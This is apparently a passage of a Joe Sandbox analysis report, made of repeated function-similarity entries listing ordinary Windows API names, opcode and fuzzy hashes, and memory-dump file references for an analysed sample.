                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                            • Opcode ID: 2a1a34c23c061acde6bdbeebd1a2f01149dce54cd8164de65d9e2cbb96c69dac
                                                                                                                                            • Instruction ID: 7d4c5a10ff34f25828cbeb2d4f4dc38567b1bcac874b4f28ef05dadbe15e210c
                                                                                                                                            • Opcode Fuzzy Hash: 2a1a34c23c061acde6bdbeebd1a2f01149dce54cd8164de65d9e2cbb96c69dac
                                                                                                                                            • Instruction Fuzzy Hash: 70318F33608B8187DB609F24E8407AE33A8FB88754F540136EA9D83B98DF3ED245CB05
                                                                                                                                            APIs
                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6EF6E3F74
                                                                                                                                              • Part of subcall function 00007FF6EF6DBDF0: GetCurrentProcess.KERNEL32(00007FF6EF6E517D), ref: 00007FF6EF6DBE1D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                            • String ID: *?$.
                                                                                                                                            • API String ID: 2518042432-3972193922
                                                                                                                                            • Opcode ID: 61dddb0fd46d8b382a6636bcfdb25f8edd0f775905ac41a4c6184214faf47e9a
                                                                                                                                            • Instruction ID: 87140415de3f14617893ee5644db097a1b0c67f0687267e7e31d4ddfada99839
                                                                                                                                            • Opcode Fuzzy Hash: 61dddb0fd46d8b382a6636bcfdb25f8edd0f775905ac41a4c6184214faf47e9a
                                                                                                                                            • Instruction Fuzzy Hash: 8B51F027B14A9687EF10CFB29C002F867A8AB58BD8B448136DE0D87B85DE3ED1019305
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpy_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                            • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                                                            • Instruction ID: 4d8be04ff5fe09731b55b7f9b5fb0b03a75fd42ac222841e8de0b19f076dc853
                                                                                                                                            • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                                                            • Instruction Fuzzy Hash: E3D1B033B2828287DB24CF15E58476AB7A5FB98784F149134DB4E97B44CE3EEA419B04
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .
                                                                                                                                            • API String ID: 0-248832578
                                                                                                                                            • Opcode ID: efa14f07fd73d25343c0280479d6777896963f113de0eda36cb2539f636c16eb
                                                                                                                                            • Instruction ID: 34a98326b238fb1d52c3763ae466988ab45c108de9241e8d4a7617ce2d8795d3
                                                                                                                                            • Opcode Fuzzy Hash: efa14f07fd73d25343c0280479d6777896963f113de0eda36cb2539f636c16eb
                                                                                                                                            • Instruction Fuzzy Hash: 40314B27B146914BFB209B32AC047BA6B95AB54BE0F14C335EE6C87BC5CE3DD2019309
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 15204871-0
                                                                                                                                            • Opcode ID: a32fc3c40a7428acc91df0296d6ee665e8b2f9a2d23ac3dad888973b23c96d3a
                                                                                                                                            • Instruction ID: 35b4647b58114a069532b1be0286ac2f8648fd7d892a7e83ce4651fc329ac607
                                                                                                                                            • Opcode Fuzzy Hash: a32fc3c40a7428acc91df0296d6ee665e8b2f9a2d23ac3dad888973b23c96d3a
                                                                                                                                            • Instruction Fuzzy Hash: 62B16B73604B858BEB15CF29C88636C3BE4F784B48F198921DA6D837A8CF3AD551D705
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ObjectRelease$CapsDevice
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1061551593-0
                                                                                                                                            • Opcode ID: ea1151332f62513495a99a760a14d735b9f2695823dc17b4f3689cdaa19b8cc4
                                                                                                                                            • Instruction ID: 00aa66fd4b5e4cf579d1b7b20c29e219a978924835ba97967bb78c6083f0edb9
                                                                                                                                            • Opcode Fuzzy Hash: ea1151332f62513495a99a760a14d735b9f2695823dc17b4f3689cdaa19b8cc4
                                                                                                                                            • Instruction Fuzzy Hash: 11814937B08B4587EB109F6AE840AAC3775FB88B88F104522CE0D97B28DF7AE145D745
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FormatInfoLocaleNumber
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2169056816-0
                                                                                                                                            • Opcode ID: 1bfa26faf9951514472b653d0b127fd4e41c5556f325b3309d472936a36c29d1
                                                                                                                                            • Instruction ID: 991273f9e6aff522e3ea6325a6ebc7e271c9e8fe9d77f63aa1d55f42a70fa374
                                                                                                                                            • Opcode Fuzzy Hash: 1bfa26faf9951514472b653d0b127fd4e41c5556f325b3309d472936a36c29d1
                                                                                                                                            • Instruction Fuzzy Hash: BD115927A09B8597E7618F61F8103E97364FB88B88F844135EA8C87718DF3DE119D74A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3479602957-0
                                                                                                                                            • Opcode ID: bc9588781f9e8ae787a89482c96c7bb4dfbb91f801cfc18cd6f2d20acdee2986
                                                                                                                                            • Instruction ID: 9c3a9121f22d79d1d02206c23a870cfe2590052fcf46e9f924907525cf724be6
                                                                                                                                            • Opcode Fuzzy Hash: bc9588781f9e8ae787a89482c96c7bb4dfbb91f801cfc18cd6f2d20acdee2986
                                                                                                                                            • Instruction Fuzzy Hash: 29E06573B1874183E7208F32B44032AA399BF55BC8F188134EA5987A98DF3DD6559709
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: CMT
                                                                                                                                            • API String ID: 0-2756464174
                                                                                                                                            • Opcode ID: 30343adeb27f084d3fe5ec6bc8831c2efd241b0a441db7c0f0173fc8b8a10148
                                                                                                                                            • Instruction ID: 7002dba1e8dc21a1770de88c42361a54b9b9bfe9d4e54d9c37ef214083c9cae3
                                                                                                                                            • Opcode Fuzzy Hash: 30343adeb27f084d3fe5ec6bc8831c2efd241b0a441db7c0f0173fc8b8a10148
                                                                                                                                            • Instruction Fuzzy Hash: D662F133B0828297EB189B25D1413FA67A8FB90344F404436E79E8769ADF3EF555E306
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Version
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1889659487-0
                                                                                                                                            • Opcode ID: b24f66d090e7cb5f496f2a22c6f8819c0f8df7583923e225ed1b1fa359690d18
                                                                                                                                            • Instruction ID: 6199bb14d89e021f365d9aecfd940c104bee89c90d4b69b86512975406cd4a23
                                                                                                                                            • Opcode Fuzzy Hash: b24f66d090e7cb5f496f2a22c6f8819c0f8df7583923e225ed1b1fa359690d18
                                                                                                                                            • Instruction Fuzzy Hash: D4018437D4D9818BFA315720B4243B52754AFA5305F441574E58D862DADF7FA0449B0F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 3215553584-4108050209
                                                                                                                                            • Opcode ID: 8fbd82179a0bfb313418515da4d647e3634da0e7ec0b4ab49d5c9d9e44874204
                                                                                                                                            • Instruction ID: 31dada4ec6dcefdf86bb1d8d27298156ffd60e3e3b36300ff8b13fac9fad2ef1
                                                                                                                                            • Opcode Fuzzy Hash: 8fbd82179a0bfb313418515da4d647e3634da0e7ec0b4ab49d5c9d9e44874204
                                                                                                                                            • Instruction Fuzzy Hash: 3281D023A1820387EAA8BE25954077E2398EF85748F741531DD09C76D5CF2FE846AB4B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 3215553584-4108050209
                                                                                                                                            • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                                                                            • Instruction ID: 1627bba7a96c66c179e1cdbeb980cf1d7cd5ab671e027b86d3612952aae67f7a
                                                                                                                                            • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                                                                            • Instruction Fuzzy Hash: 9A71C263A0C24A47FA78AA28804037D57989F85744F340631DD09EB6D6CF2FE846BF4B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                            • Opcode ID: 1f13d54a2f9508399cb7b836371d43eb46be01b66e99a774fe7656775252a00f
                                                                                                                                            • Instruction ID: e744fea78d5bfda1e0d8d577dfbbf2c0f99db619424840a28d1bdf8087f95775
                                                                                                                                            • Opcode Fuzzy Hash: 1f13d54a2f9508399cb7b836371d43eb46be01b66e99a774fe7656775252a00f
                                                                                                                                            • Instruction Fuzzy Hash: FF410D33714A448BEF44CF2AE8142A973A9AB88FC0B59A032DE0DC7754EE3DE542D305
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HeapProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                            • Opcode ID: d070c0900ae74f71d1c1d3c79620b9063d35bd6a65a1e84854eee095204d118d
                                                                                                                                            • Instruction ID: 7894c4e39f0bcbc56366e272d4db095c2f2aba169a013a2f91e6f7efb043da44
                                                                                                                                            • Opcode Fuzzy Hash: d070c0900ae74f71d1c1d3c79620b9063d35bd6a65a1e84854eee095204d118d
                                                                                                                                            • Instruction Fuzzy Hash: FFB09226E07B02C7FE482B527C96B1423A86F58B10FD84078C00C82320DE3E21F5A746
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4f3fd9693064f14b98246b0902696b6ddb848b57710f43f9edc21379a48acf59
                                                                                                                                            • Instruction ID: fd18876545126728a7fd6c3cefb40925b8c73f4080281032f593c3eb26e1a33f
                                                                                                                                            • Opcode Fuzzy Hash: 4f3fd9693064f14b98246b0902696b6ddb848b57710f43f9edc21379a48acf59
                                                                                                                                            • Instruction Fuzzy Hash: DA72AFAAD3EF865AE303A73954031A6E7186FF35C9641E32BFD9432C52FB11A6D25204
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 538b2af4148d52b0e0a3f2785ca9e9110ee7305f6a0c25a72d3737ecd3153b96
                                                                                                                                            • Instruction ID: 3eb512520589654e702b6bd2e2790c9c1850d6277000d0062f74b6627e4ec695
                                                                                                                                            • Opcode Fuzzy Hash: 538b2af4148d52b0e0a3f2785ca9e9110ee7305f6a0c25a72d3737ecd3153b96
                                                                                                                                            • Instruction Fuzzy Hash: E262DFB3A092C18BEB14CE24D4447BC3BA5F755748F05813ACBAA8BB85CE3DE505E715
                                                                                                                                            Memory Dump Source
